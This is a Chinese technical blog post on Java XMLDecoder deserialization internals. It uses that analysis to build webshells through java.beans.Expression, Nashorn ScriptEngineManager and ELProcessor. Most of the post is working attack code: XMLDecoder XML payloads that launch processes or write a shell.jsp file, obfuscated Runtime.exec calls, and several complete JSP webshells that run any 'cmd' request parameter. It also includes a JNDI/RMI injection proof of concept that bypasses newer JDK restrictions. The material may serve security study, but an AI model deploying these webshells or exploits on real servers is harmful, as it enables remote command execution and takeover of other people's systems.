反序列化漏洞底层扩展与制作WebShell

最新推荐文章于 2025-08-05 17:34:52 发布
最新推荐文章于 2025-08-05 17:34:52 发布
阅读量228 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: java 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75857562/article/details/128687048
本文深入探讨了XMLDecoder反序列化漏洞的底层机制,详细介绍了如何利用Expression和ScriptEngineManager制作WebShell。讲解了Java执行JS代码的原理,并分析了ELProcessor在WebShell制作中的应用。同时,文章提到了利用ELProcessor进行无回显WebShell的创建,以及与JNDI注入的关系。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XMLDecoder反序列化漏洞底层

这里我主要是就是一下最后的执行是怎么样的。也就是Expression类的使用

import java.beans.Expression;

public class test {
    public static void main(String[] args)throws Exception {
        Parameter(); //有参数
        NoParameter(); //无参数
    }
    public static void Parameter() throws Exception{
        Object var3 = new ProcessBuilder();
        String var4 = "command";
        String[] strings = new String[]{"calc"};
        Object[] var2 = new Object[]{strings};
        Expression var5 = new Expression(var3, var4, var2);
        Object value = var5.getValue(); //获得参数的类

        String var1 = "start";
        Object[] var6 = new Object[]{};
        Expression expression = new Expression(value, var1, var6); //执行start方法
        expression.getValue();

//        为什么不能执行?因为class.newInstance只能调用无参构造函数而ProcessBuilder没有无参数构造函数。
//        Class<?> aClass = value.getClass();
//        Object o = aClass.newInstance();
//        Method start = aClass.getMethod("start");
//        start.invoke(o);
    }
    public static void NoParameter(){
        String[] strings = new String[]{"cmd.exe","/c","calc"};
        Object var3 = new ProcessBuilder(strings);
        String var4 = "start";
        Object[] var2 = new Object[]{};
        Expression var5 = new Expression(var3, var4, var2);
        try {
            var5.getValue();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

并且通过测试可以发现Expression的使用,给出下面的例子。

public class cmd {
    public void Noparameter(){
        System.out.println("无参数调用....");
    }
    public void Parameter(Object[] obj){
        System.out.println("有参数调用....");
    }
}
import java.beans.Expression;

public class test1 {
    public static void main(String[] args)throws Exception {
        Object var3 = new cmd();
        String var4 = "Parameter"; //Noparameter
        Object[] var2 = new Object[]{"233333"};
        var2 = new Object[]{var2};
        var2 = new Object[]{};
        Expression var5 = new Expression(var3, var4, var2);
        var5.getValue();
    }
}

并且给出了一些exp。

 <? xml version="1.0" encoding="UTF-8" ?> 
<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
            <void index="0">
                <string>cmd.exe</string>
            </void>
            <void index="1">
                <string>/c</string>
            </void>
            <void index="2">
                <string>calc</string>
            </void>
        </array>
        <void method="start">
        </void>
    </object>
</java>

通过实体编码绕过

 <? xml version="1.0" encoding="UTF-8" ?> 
<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
            <void index="0">
                <string>cmd.exe</string>
            </void>
            <void index="1">
                <string>/c</string>
            </void>
            <void index="2">
                <string>calc</string>
            </void>
        </array>
        <void method="start"/>
    </object>
</java> 

 <? xml version="1.0" encoding="UTF-8" ?> 
<java>
 <object class="java.io.PrintWriter">
  <string>D:\shell.jsp</string>
  <void method="println">
  <string>
   webshell
 </string>
  </void>
  <void method="close"/>
 </object>
</java>

想了一下Expression类,底层是通过反射执行的, 那我们能可以制作webshell了

制作WebShell

Expression

package shell.Expression;

import java.beans.Expression;

public class test {
    public static void main(String[] args) {
        String payload ="calc";
        Expression expression = new Expression(Runtime.getRuntime(),"\u0065"+"\u0078"+"\u0065"+"\u0063",new Object[]{payload});
        try {
            expression.getValue();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

上面是java代码,执行的原理是反射在getValue方法中可以清楚的看到,要制作webshell就需要jsp代码。

<%@ page import="java.beans.Expression"%>
<%@ page contentType="text/html; charset=UTF-8" language="java" %>
<%
    String payload =request.getParameter("cmd");
    Expression expression = new Expression(Runtime.getRuntime(),"\u0065"+"\u0078"+"\u0065"+"\u0063",new Object[]{payload});
    expression.getValue();
%>

介绍到这里又突然想到了其他表达式类的执行。

ScriptEngineManager

通过ScriptEngineManager这个类可以实现Java跟JS的相互调用,虽然Java自己没有eval函数,但是ScriptEngineManager有eval函数,并且可以直接调用Java对象,也就相当于间接实现了Java的eval功能。

package shell.ScriptEngineManager;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;

public class test {
    public static void main(String[] args) throws Exception{
        String test = "print('hello word!!');";
        String payload1 = "java.lang.Runtime.getRuntime().exec("calc")";
        String payload2 = "var a=exp();function exp(){var x=new java.lang.ProcessBuilder; x.command("calc"); x.start();};";
        String payload3 = "var a=exp();function exp(){java.lang./****/Runtime./***/getRuntime().exec("calc")};";
        String payload4 = "\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0052\u0075\u006e\u0074\u0069\u006d\u0065.getRuntime().exec("calc");";
        String payload5 = "var a= Java.type("java.lang"+".Runtime"); var b =a.getRuntime();b.exec("calc");";
        String payload6 = "load("nashorn:mozilla_compat.js");importPackage(java.lang); var x=Runtime.getRuntime(); x.exec("calc");";
        //兼容Rhino功能 https://blog.youkuaiyun.com/u013292493/article/details/51020057
        String payload7 = "var a =JavaImporter(java.lang); with(a){ var b=Runtime.getRuntime().exec("calc");}";
//        String payload8 = "var scr = document.createElement("script");scr.src = "http://127.0.0.1:8082/js.js";document.body.appendChild(scr);exec();";
        eval(payload7);
    }
    public static void eval(String payload){
        payload=payload;
        ScriptEngineManager manager = new ScriptEngineManager(null);
        ScriptEngine engine = manager.getEngineByName("js");
        try {
            engine.eval(payload);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

然后自己突发奇想,思考能不能远程加载js代码?然后执行远程js代码里面的exp。参考payload8

function exec(){    
    var a=exp();function exp(){var x=new java.lang.ProcessBuilder; x.command("calc"); x.start();};
}

执行失败!百度了一下原因大概是因为java在执行js代码的时候没有浏览器的内置对象如:document,window等等。

解决方法大概就是添加组件配置java解析浏览器的环境??这样的话基本上不可能这样配置了,于是自己就没有在深入了解了。

java执行js代码的底层原理

这里自己调试会很多次中间的具体流程基本上就是一个解析过程,所以只看最后。

其实本质上还是反射。最后的调用apply:393, ScriptRuntime (jdk.nashorn.internal.runtime) 的apply方式去执行。

在看一下调用栈:

apply:393, ScriptRuntime (jdk.nashorn.internal.runtime)
evalImpl:449, NashornScriptEngine (jdk.nashorn.api.scripting)
evalImpl:406, NashornScriptEngine (jdk.nashorn.api.scripting)
evalImpl:402, NashornScriptEngine (jdk.nashorn.api.scripting)
eval:155, NashornScriptEngine (jdk.nashorn.api.scripting)
eval:264, AbstractScriptEngine (javax.script)
eval:24, test (shell.ScriptEngineManager)
main:17, test (shell.ScriptEngineManager)

调试过程大家可以自己去测试

而上面的加载远程js的思路是来自自己调试的过程。

那webshell.无回显的

<%@ page import="javax.script.ScriptEngineManager" %>
<%@ page import="javax.script.ScriptEngine" %>
<%
    ScriptEngineManager manager = new ScriptEngineManager(null);
    ScriptEngine engine = manager.getEngineByName("js");
    String payload = request.getParameter("cmd");
    engine.eval(payload);
%>

然后不得不说java中还有一个表达式执行的,那就是EL表达式

ELProcessor

表达式语言(Expression Language),或称EL表达式,简称EL,是Java中的一种特殊的通用编程语言,借鉴于JavaScript和XPath。主要作用是在Java Web应用程序嵌入到网页(如JSP)中,用以访问页面的上下文以及不同作用域中的对象 ,取得对象属性的值,或执行简单的运算或判断操作。EL在得到某个数据时,会自动进行数据类型的转换。

ELProcessor也有自己的eval函数,并且可以调用Java对象执行命令。

package shell.EL;

import javax.el.ELProcessor;

public class test {
    public static void main(String[] args) throws Exception {
        String payload = """.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("var exp='calc';java.lang.Runtime.getRuntime().exec(exp);")";

        String poc = "''.getClass().forName('javax.script.ScriptEngineManager')" +
                ".newInstance().getEngineByName('nashorn')" +
                ".eval("s=[3];s[0]='cmd.exe';s[1]='/c';s[2]='calc';java.lang.Runtime.getRuntime().exec(s);")";

        ELeval(payload);
    }
    public static void ELeval(String payload){
        payload=payload;
        ELProcessor elProcessor = new ELProcessor();
        try {
            elProcessor.eval(payload);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

我们也可以看看EL表达式的底层原理。

EL表达式的底层原理

我们使用payload进行debug调试,一直跟着流程走发现最后还是通过反射去执行。

最后在AstValue类中执行getValue方法,从而调用payload,之后就会js代码执行的流程一样了。

调用栈:

getValue:159, AstValue (org.apache.el.parser)
getValue:190, ValueExpressionImpl (org.apache.el)
getValue:61, ELProcessor (javax.el)
eval:54, ELProcessor (javax.el)
ELeval:20, test (shell.EL)
main:13, test (shell.EL)

webshell.无回显的

<%@ page import="javax.el.ELProcessor"%>
<%@ page contentType="text/html; charset=UTF-8" language="java" %>
<%
    String cmd =request.getParameter("cmd");
    String payload = """.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("var exp='"+cmd+"';java.lang.Runtime.getRuntime().exec(exp);")";
    ELProcessor elProcessor = new ELProcessor();
    elProcessor.eval(payload);
%>

介绍到这里,突然想到了jndi注入绕过jdk191+,其中的一种方法就是利用ELProcessor类

这里直接给出poc

Registry registry = LocateRegistry.createRegistry(rmi_port);
// 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
// 强制将 'x' 属性的setter 从 'setX' 变为 'eval', 详细逻辑见 BeanFactory.getObjectInstance 代码
ref.add(new StringRefAddr("forceString", "KINGX=eval"));
// 利用表达式执行命令
ref.add(new StringRefAddr("KINGX", """.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/c','calc']).start()")"));
ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
registry.bind("Exploit", referenceWrapper);

总结

通过学习XMLDecoder的底层执行的流程去发现其他表达式执行,而其中的很多底层都是通过java反射技术实现的!

网安护手
关注
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 1261
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 2758
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
bmcl java_Shiro rememberMe 反序列化漏洞Webshell
weixin_32797441的博客
02-28 377
Shiro rememberMe 反序列化漏洞Webshell修改ysoserial使其支持生成java代码执行Payload原来的代码String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\")...
java反序列化soap_Java反序列化利用工具 — Java Deserialization Exp Tools – WebShell'S Blog...
weixin_39691233的博客
02-25 263
Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。FreeBuf上已经公开了JBoss反序列化执行命令回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。本工具暂时支持的...
java8使用nashornjavascript交互
★匆匆★的专栏
09-12 2086
指定重載方法 实际上方法在 JavaScript 不过是个特性,为函数实例,因此,除了使用存在的方法之外,也可以使用 [] 来取得代表方法的函式: var System = Java.type('java.lang.System'); System.out.println('Hello, World'); // Hello, World System.out['println']('Hello, World'); // Hello, World Java 中支援重載(Overload)方..
网络安全反序列化漏洞底层扩展制作WebShell
HBohan的博客
08-07 667
XMLDecoder反序列化漏洞底层 参考的文章已经分析的非常详细了,这里我主要是就是一下最后的执行是怎么样的。也就是Expression类的使用 import java.beans.Expression; public class test { public static void main(String[] args)throws Exception { Parameter();//有参数 NoParameter();//无参数 } publi.
网络安全反序列化漏洞底层扩展制作WebShell
2201_75856701的博客
02-10 225
通过学习XMLDecoder的底层执行的流程去发现其他表达式执行,而其中的很多底层都是通过java反射技术实现的!
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1239
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
【杂谈Java内存Webshell的攻防】
mingyqf的博客
05-01 1114
侵刪 杂谈Java内存Webshell的攻防 长小亭 网络安全知识的搬运工~ 这篇文章主要以Tomcat为例子记录了一些关于Java内存Webshell利用检测以及相关的思考。 内存Webshell的利用方式 现在的内存Websell的利用方式个人感觉可以分为以下三种: \1. 基于Servlet规范的利用,动态注册Servlet规范中的组件,包括Servlet,Filter,Listener,这部分的公开文章比较多,比如: 基于tomcat的内存 Webshell 无文件攻击技术 - 先知社区 x
Java 安全之反序列化漏洞
hl1293348082的专栏
03-30 8210
1.序列化反序列化: 序列化反序列化对于 Java 程序员来说,应该不算陌生了,序列化反序列化简单来说就是 Java 对象数据之间的相互转化。 那么对于完全面向对象的 Java 语言来说为什么要有序列化机制? 实质上,序列化机制并不只局限于 Java 语言,序列化的本质是内存对象到数据流的一种转换,我们知道内存中的东西不具备持久性,但有些场景却需要将对象持久化保存或传输。例如缓存系统中存储了用户的 Session,如果缓存系统直接下线,带系统重启后用户就需要重新登陆,为了使缓存系统内存中的 S
远程命令执行反序列化之——jboss中间件反序列化漏洞获取Webshell还原
温柔小薛的博客
04-13 739
jboss中间件反序列化漏洞获取Webshell还原 理论 可以在谷歌浏览器的wappalyzer插件中查看jboss相关信息 历史漏洞参考;https://www.seebug.org/appdir/JBoss https://www.jianshu.com/p/e34062e0a6f1 默认后台地址:http://localhost:8080/jmx-console (前面讲过可以在这里...
javax.servlet.ServletException: javax/el/ValueExpression 集锦
I_buntu的专栏
05-10 7352
javax.servlet.ServletException: javax/el/ValueExpression java.lang.NoClassDefFoundError: javax/el/ValueExpression java.lang.ClassNotFoundException: javax.el.ValueExpression
[源码和文档分享]基于C语言实现的表达式求解
qq_38474647的博客
12-17 240
1 解题思路 构造包含顶指针,底指针和增量的结构体。然后分别构造一个只包含运算符的栈(OPTR)和只包含数字的栈(OPND)。之后依次读入所输入的表达式。判断是不是数字,如果是数字就将数字放入数字栈(OPND)。如果不是即运算符,让运算符栈栈顶元素和读入的运算符进行比较。如果优先级小于将读入的运算符入栈,优先级相等的就让栈顶元素出栈,优先级的大于的就让栈顶...
PHP反序列化漏洞Webshell
vspiders的博客
03-21 5258
前言最近和小伙伴们一起研究了下PHP反序列化漏洞,突发奇想,利用反序列化漏洞写一个一句话木马效果应该蛮不错的。于是便有此文。0x01 PHP反序列化说起PHP反序列化,那必须先简单说一下PHP的序列化。PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输,比如跨脚本等。而PHP反序列化是将序列化之后的字节流还原成对象、字符、数组等。但是PHP序列化是不会保存对象的方法。&lt;?php c...
JVM 01 运行区域
2301_79308687的博客
08-02 1097
虚拟机隐藏平台差异,解决不同平台代码运行结果不一致问题,实现,实现用户代码跨平台。它本身是一个操作系统上的应用程序,将字节码文件翻译成特定机器的机器码。
Flash循环存储的地址回绕处理:跨边界写入的三种实现方案
最新发布
u010360138的博客
08-05 597
本文介绍了三种实现Flash循环存储地址计算的方法:1)条件判断法通过显式判断是否溢出实现地址回绕,逻辑清晰通用性强;2)模运算法利用取模运算自动处理地址回绕,代码简洁;3)位掩码法在存储区大小为2的幂时使用位运算替代模运算,性能最优。三种方法功能等效但各有特点,选择时应考虑存储区特性、性能需求和代码可读性。关键注意事项包括写入延迟、地址有效性检查和边界条件处理。
mybatis-plus动态数据源
qq_62408075的博客
08-01 217
不同于mybatis动态数据,mybatisplus自带很多查询方法。
蚁剑集成了哪些功能 文件管理 DB操作 bypassUAC 虚拟终端
07-03
用户之前讨论过Shiro反序列化漏洞,现在突然转向渗透测试工具功能,可能是想了解攻击面扩展或防御措施。不过当前问题很明确是工具功能解析,需聚焦技术细节。 关于文件管理模块,蚁剑的实现类似FTP客户端,但支持...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值